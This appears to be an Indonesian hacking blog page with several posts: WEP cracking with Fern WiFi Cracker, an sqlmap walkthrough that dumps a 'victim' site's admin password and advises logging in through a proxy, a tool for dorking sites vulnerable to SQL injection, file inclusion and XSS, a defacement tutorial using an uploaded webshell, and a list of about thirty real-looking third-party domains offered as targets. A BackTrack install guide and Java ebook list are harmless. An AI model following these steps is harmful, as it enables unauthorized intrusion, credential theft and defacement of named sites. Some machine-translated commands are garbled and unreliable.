Home » All posts

Kamis, 13 Februari 2014

Hacking Wifi Dengan Fren-wifi-cracker Pada Backtrack 5 R3

1. Terlebih dahulu silahkan login ke backtrack anda dan pilih
Backtrack >> Exploitation Tools >> Wireless exploitation tools >> WLAN exploitation >> Fern-WiFi-Cracker
2. Pilih wereless interface anda
3.  Klik tombol logo Wi-Fi di atas dan itu akan memulai pemindaian jaringan. Anda dapat mengatur pengaturan dengan klik ganda di jendela aplikasi.
4. Setelah pemindaian Anda akan melihat tombol aktif cracking WEP WiFi atau retak WPA. Karena tersedia WiFi WEP klik tombol
5.  Kotak dialog baru akan terbuka. Mengatur pengaturan dengan memilih jaringan WEP dari daftar dan pilih jenis serangan. Setelah Anda menyelesaikan mengatur pengaturan sekarang memulai serangan dengan klik tombol Serangan.
6. Tunggu sampai progress bar 100% selesai dan setelah itu menyelesaikan Cracker WiFi Fern akan mulaiaircrack untuk cracking password wifi.

SEMOGA BERHASIL……!!!!!!
23.05  Unknown  No comments
Read More

Hack Website Using Backtrack Sqlmap

1. Buka terminal mundur dan jenis cd / pentest / database / sqlmap dan tekan enter. Sekarang sqlmap terbuka di terminal Andasql map 1
2. Sekarang menemukan situs rentan. (Baik saya sudah memiliki situs rentan) 
sql map 2
3. Sekarang ketik perintah ini di terminal dan tekan enter. (Lihat di atas gambar)
python sqlmap.py-u http://yourvictim 'menyelinap / index.php id =? 4 -dbs

 4. Sekarang Anda akan mendapatkan nama database website 
sql map 3
Yah aku punya dua database aj dan information_schema kita akan memilih database aj. 

 5. Sekarang mendapatkan tabel database tersebut. untuk itu Anda perlu memasukkan perintah ini ke terminal Anda dan hanya tekan Enter.
python sqlmap.py-u slink / index.php http://yourvictim '? id = 4 -D (nama database)-tabel

 6. Sekarang kita perlu untuk mengambil tabel dari database aj. paste perintah bawah perintah dan tekan enter.
python sqlmap.py-u http://www.yourvictim 'slink.com / index.php id =? 4 -D aj-tabel
sql map 4
7. Sekarang Anda akan mendapatkan daftar tabel yang disimpan dalam database aj. 
sql map 5
8. Sekarang mari kita ambil kolom dari tabel admin
python sqlmap.py-u http://www.yourvictim 'slink.com / index.php id = 4? -T admin - kolom
sql map 7
Sekarang kita punya kolom dan kami mendapat username dan password 
9. Sekarang mari kita ambil password admin
python sqlmap.py-u ? slink.com / index.php http://www.yourvictim 'id = 4 -T admin-U test - dump
Sekarang kita punya username dan password dari website! 
sql map 9
Sekarang hanya menemukan admin pidana website dan menggunakan proxy / vpn ketika Anda mencoba untuk login di website sebagai admin.
22.58  Unknown  No comments
Read More

Instalasi Backtrack 5 Di Windows

Sebelum kita mulai kita harus mengosongkan satu partisi yang akan kita tempatkan untuk menginstall BackTrack ini minimal 20 GB biar ada ruang yang digunakan untuk menginstall aplikasi-aplikasi kebutuhan kita, karena File System besarnya mencapai 11 GB.
Oke pertama-tama siapkan dulu CD BackTrack 5 r3 atau bisa juga menggunakan Flashdisk sebagai pengganti CD. Kalau belum punya silahkan download aja langsung dari situs resminyadisini dan cara downloadnya disini sedangkan cara booting melalui Flashdisk disini.
Oke setelah semuanya kelar masukkan CD Installer atau kalau menggunakan flashdisk colokkan flashdisknya. Lalu booting melalui CD/Flashdisk. Lalu tunggu sebentar sampai keluar tulisan "boot" lalu tekan Enter setelah itu tunggu lagi sampai keluar seperti gambar berikut :
Setelah keluar tampilan seperti diatas pilih saja "BackTrack Text - Default Boot Text Mode" atau yang paling atas kemudian tunggu sebentar sampai keluar tampilan berikut :
Kemudian ketikkan "startx" tanpa tanda petik seperti gambar diatas lalu tekan enter. dan tunggu lagi sampai prosesnya selesai.
dan munculah tampilan seperti diatas. Di klik saja.
di klik lagi.
atur lokasi sesuai dengan waktu ditempat anda bila anda berada di wilayah WIB pilih saja "Indonesia (Jakarta)" jika WIT pilih "Indonesia (Pontianak)" dan jika WITA pilih saja "Indonesia (Makassar)" lalu forward.
dibiarkan saja klik forward lagi.

lalu pilih saja "Specify partitions manually (advanced)" supaya kita yang akan menentukan di partisi mana kita akan menginstallnya. oke forward lagi.
nah disini kita akan menentukan di partisi mana kita akan menginstallnya. seperti gambar diatas, saya sudah mengosongkan satu partisi. oke sekarang klik saja "Add" kemudian keluar tampilan seperti berikut :
dibagian 'Type for the new partition' pilih saja "Logical" dan di 'Location for the new partition' pilih saja "End" supaya partisinya berada di paling akhir karena kalu kita pilih "Beginning" partisinya akan berada di paling awal, di bagian 'Use as' pilih "Ext4 journalling file system" karena kalau kita menggunakan "NTFS" backtracknya tidak akan bisa booting, sebab filesystem Linux dengan Windows itu berbeda tidak sama seperti Windows yang menggunakan format "NTFS". kemudian pada 'Mount point' pilih saja "/" supaya bootingnya bisa lancar dan bisa langsung dual boot dengan Windows. klik OK dan klik forward lagi.
dicentang saja seperti gambar diatas kli forward lagi.
klik Continue.
langsung klik Install.
dan tunggu sampai prosesnya selesai setelah selesai klik saja Restart biar langsung bisa dicoba tanpa menggunakan Live CD.
Oke sekian tutorial ini saya buat semoga bermanfaat.
Wassalam..
22.55  Unknown  No comments
Read More

Kamis, 30 Januari 2014

XCode SQLI/LFI/XSS Vulnurable & webshell Scanner



[Image: scansqlinjection.png]

Download XCode SQLI/LFI/XSS Vulnurable & webshell Scanner vers.1.2

Masih Ingat dengan Reiluke Exploit Scanner? saya yakin banyak yang sudah pernah menggunakannya karena sudah pernah penulis bahas di forum XCode - Yogyafree dan beberapa dari pembaca pasti bertanya "mengapa saat ini tool tersebut tidak bisa digunakan lagi atau tidak memunculkan hasil pencarian dari dork?". Kira kira ini mungkin bisa menjawab rasa penasaran rekan-rekan.

Setelah penulis bedah tool Reiluke Exploit Scanner, ternyata tool ini tidak mencari langsung dork yang kita isi ke google tapi melalui http://blackle.com/. Blackle adalah website yang menggunakan source Google untuk menampilkan hasil pencarian dan beberapa waktu yang lalu Blackle.com di-block oleh Google sehingga pencarian menjadi kosong. Dan setelah beberapa waktu kemudian, pemilik website tersebut menambahkan /cse?cx= ke source script web Blackle sehingga web menjadi normal kembali.

Lalu apa hubungannya dengan reiluke? Tool ini sepertinya tidak diupdate lagi oleh pembuatnya dan Reiluke masih memanfaatkan script lama Blackle yang saat ini sudah diubah oleh pihak Blackle sendiri. akibatnya Reiluke Exploit Scanner tidak bisa lagi menampilkan hasil Dorking. Yep.. gambaran sederhananya adalah misalnya Reiluke mengirimkan perintah ke blackle yang semula dari Http://www.google.com/search?= sedangkan saat ini Blackle sudah mengubah scriptnya menjadi http://www.google.com/cse?cx= .

Penulis mencoba membuat sebuah Tool XCode SQLI/LFI/XSS Vulnurable & webshell Scanner + Google Engine yang prinsip kerjanya hampir sama dengan Reiluke Exploit Scanner.Setelah download, ekstrak semua filenya dan jalankan XCodeXploitScanner.exe, Klik Dork It dan Tool ini akan mengumpulkan Link dari Dork yang anda masukkan kemudian menampilkan listnya. setelah selesai menampilkan List, Anda akan bisa melakukan scanning kerentanan SQL injection/Local File Inclusion/Cross Site Scripting pada web yang ada di list. Tool ini akan mengirimkan parameter injeksi ke web seperti ' - * /../../../../../../../../../../../../../../etc/passwd , <h1>XXS DETECTED XCode Exploit Scanner</h1> . Jika Web tersebut memiliki bug maka di status akan muncul :
http://www.target.com?blabla.php?=1234 : SQLi Vulnerable.
http://www.target.com?blabla.php?=1234/../../../../../../../../../../../../../../etc/passwd LFI Vulnerable
http://www.target.com?blabla.php?=1234<h1>XXS DETECTED XCode Exploit Scanner</h1> XSS Vulnerable

Pada status list yang terdeteksi, anda bisa klik Open Vuln Link with Browser untuk menampilkan web pada browser anda

Tool ini juga menambahkan webshell hunter, dimana anda bisa mencari web shell c99, r57, c100, ITsecteam_shell, b374k, yang telah diupload oleh hacker.

Mungkin masih banyak kekurangan atau Bug yang belum diketahui oleh penulis. Tapi setidaknya tool ini bisa mempermudah anda untuk mencari target.

Semoga Berguna

Screen Shot :
LFI Vuln Scanner
[Image: xcodeexploitscanner2res.png]

Web Shell Hunter
[Image: scanwebshell.png]

================================================== ==============
Credits:

Code name : .::XCode SQLI Vulnurable Scanner Vers.1.1::.
Description : - SQLI Vulnurable Hunter with Google Engine -
Compiler : Microsoft Visual Basic 6.0
Author : poni
System : Windows 95, 98, XP, Vista, 7
Size : 2 Mb
================================================== ==============
XCode SQLI Vulnurable Scanner help you to gather the dorks
Link from Google. then you may check the results if its
Vulnurable to exploit with SQL commands
================================================== ===============
22.24  Unknown  No comments
Read More

Tutorial deface dengan Fake Root

Hallo sobat ... kali ini saya akan share., cara deface menggunakan fake root :)
Oke, disimak yah ^^

Pertama - tama kita harus punya bahan - bahan'a dulu ^^
- Web vuln anda bisa menggunakan teknik Exploit joomla , Exploit Wordpress , Config web vuln
-  Shell 1NJECTION anda bisa mendowload disini  Mirror : Shell Config killer <<Dowload>>
  NB : Shell 1NJ3CTION v3.3 <<Tanpa Login>>

Oke disimak yah :)
Pertama - tama kita harus punya web yang sudah ditanam shell..., 
Kira - kira tampilan akan seperti ini 


Klik 2x tombol menu symlink

contoh gambar dibawah :


Kalo udh akan muncul beberapa menu., Pilihlah menu Domain list
lalu klik 2x


Taraaaaaaaaaaaaaaaaaa., Muncul deh website - website yang 1 server sama web tadi..,
cara mengecek web tadi vuln fake root
copy salah satu url web yang satu server sama web tadi.
tambahkan ~root di belakang url web tadi.,
contoh : ww.site.com/~root/
maka jika hasil'a akan forbidden...., so., web tadi vuln fake root jika tidak berarti tidak vuln
Sooo...
kita tinggal mengetahui root web nya aja
Lihat gambar dibawah:


 cara melihat root webite cukup mudah :)
kalo anda sedang masuk shell "injection ., shell inject akan mempublikasikan semua tentang web tadi
dan folder yang kalian lihat
contoh folder : /home/sixwords/public_html/
jadi ROOT web tadi adalah : sixwords karena root selalu berada di tengah (antara home sama public_html)
kurang jelas ? Lihat gambar dibawah


Jika sudah , mari kita gabungkan (Web yang kita peroleh dari domain list)
Oiya sobat., sobat harus mengupload script sobat  ju'a di web tadi ,
tapi jika sobat mempaste di Index.php juga ga papa kok :)
cara mengakses jika mempaste di index.php :
www.webtadi.com/~rootweb/
cara mengakse jika mengupload script
NB : (Upload di public_html) :
www.webku.com/~rootweb/filemu.html
 Sudah paham kan sobat ?
contoh fake root :
http://artiszin.co.uk/~sixwords/ .
http://ashtonphotography.co.uk/~sixwords/ .
http://asianbusinessforum.com/~sixwords/ .
http://attualegraphics.com/~sixwords/ .
http://attualegraphics.it/~sixwords/ .
http://audienginesandgearboxes.co.uk/~sixwords/ .
http://autoleveller.co.uk/~sixwords/ .
http://automotiveairfilter.co.uk/~sixwords/ .
http://avesta.ltd.uk/~sixwords/ .
http://axisoflight.co.uk/~sixwords/ .
http://aylesburychoral.org.uk/~sixwords/ .
http://aylesburydeanery.org/~sixwords/ .
http://babtek.com/~sixwords/ .
http://badcreditloansforunemployed.org.uk/~sixwords/ .
http://badcreditpaydayloans.org.uk/~sixwords/ .
http://badcredittenantloans.org.uk/~sixwords/ .
http://bandaoke.co.uk/~sixwords/ .
http://bayleavesrestaurant.co.uk/~sixwords/ .
http://bdwebdesign.co.uk/~sixwords/ .
http://becomeacounselor.co.uk/~sixwords/ .
http://bernwodebenefice.com/~sixwords/ .
http://bespoke-education.com/~sixwords/ .
http://bestgaminglaptop.co.uk/~sixwords/ .
http://bestguarantorloansuk.co.uk/~sixwords/ .
http://bestiphone4sdeals.co.uk/~sixwords/ .
http://bestmotorhomes.co.uk/~sixwords/ .
http://bestnlessaccountants.co.uk/~sixwords/ .
http://bestonlineflashgames.net/~sixwords/ .
http://bestpersonalinjurylawyernyc.com/~sixwords/ .
http://bicestersweepers.co.uk/~sixwords/ .
dan masih banyak lagi :)
22.20  Unknown  No comments
Read More

Jumat, 24 Januari 2014

Java Ebook Untuk Belajar Pemrograman

Kumpulan ebook ini berguna untuk belajar program, belajar programmer dan belajar pemrograman khususnya mengenai “java”. Semoga bermanfaat saja deh ya.

KUMPULAN JAVA EBOOK

Free online book: Java Fundamentals
“Java Fundamentals: A entry level textbook on the Java programming language” by Gary Marrer.
Isi Ebook:
  • History of Java
  • What makes Java, Java
  • Design Tools (Modeling Program Logic)
  • Program Documentation
  • Identifiers: Variables and Constants
  • Structured Programming
  • Using Repetition Structures
  • Arrays 101
  • Introduction to Object Orientated Programming
  • Inheritance Expanded
  • AWT versus Swing Packages
  • Arrays Revisited
  • Adding data persistence to programs
Book Details
Author(s): Gary Marrer
Format(s): HTML
Link: BACA ONLINE DISINI
A “Free Java book” by Daniel L. Schuster in pdf format.
Isi Ebook
  • Fundamentals
  • ACM Java Graphics
  • Making Decisions
  • Loops
  • Methods & Objects I
  • Game Programming I
  • Useful Java Objects
  • Methods II
  • Arrays & ArrayLists
  • Objects II
  • Game Programming II
  • Arrays II
  • Quick Reference
  • Setting Up Your Computer
Book Details
Author(s): Daniel L. Schuster
Format(s): PDF
Link: DOWNLOAD DISINI
The Common Java Cookbook
“The Common Java Cookbook” by Tim O’Brien.
Isi Ebook
  • Supplements to the Java 2 Platform
  • Manipulating Text
  • JavaBeans
  • Functors
  • Collections
  • XML
  • Application Infrastructure
  • Math
  • Templating
  • I/O and Networking
  • HTTP and WebDAV
  • Searching and Filtering
  • JSON
  • Protocol Buffers
  • Google Guava: I/O
  • Google Guava: Collections
Book Details
Author(s): Tim O’Brien
Format(s): HTML, PDF
File size: 6.50 MB
Number of pages: 367
Link: DOWNLOAD ATAU BACA DISINI

Java Look and Feel Design Guidelines

  • Author: Sun Microsystems, Inc.
  • Format: online HTML
  • Price: free
Isi Ebook:
  • The Java Look and Feel
  • The Java Foundation Classes
  • Design Considerations
  • Visual Design
  • Application Graphics
  • Behavior
  • Windows and Panes
  • Dialog Boxes and Alert Boxes
  • Menus and Toolbars
  • Basic Controls
  • Text Components
  • Selectable Lists, Tables, and Tree Components
  • Keyboard Shortcuts, Mnemonics, and Other Keyboard Operations
  • Graphics Repository
  • Localization Word Lists
  • Switching Look and Feel Designs

A Guide to Modern Programming with Java


  • Author: Gregory J. E. Rawlins
  • Format: online HTML
  • Price: free
Isi Ebook:
  • Setting the Stage
  • Introducing the Players
  • Behind the Scenes
  • Character Study
  • Stage Direction
  • All Together Now
  • It Takes All Types
  • What’s in a Name?
  • Think Like an Object
  • Let the Games Begin
  • The Play’s the Thing
  • Networking
  • Defensive Programming
  • Design Patterns
  • Navel Gazing
  • Satori
  • Avoiding Style Crime
  • Java’s Flaws
  • Book Recommendations
  • The Rest of Java
00.31  Unknown  No comments
Read More

Postingan Lebih Baru Postingan Lama Beranda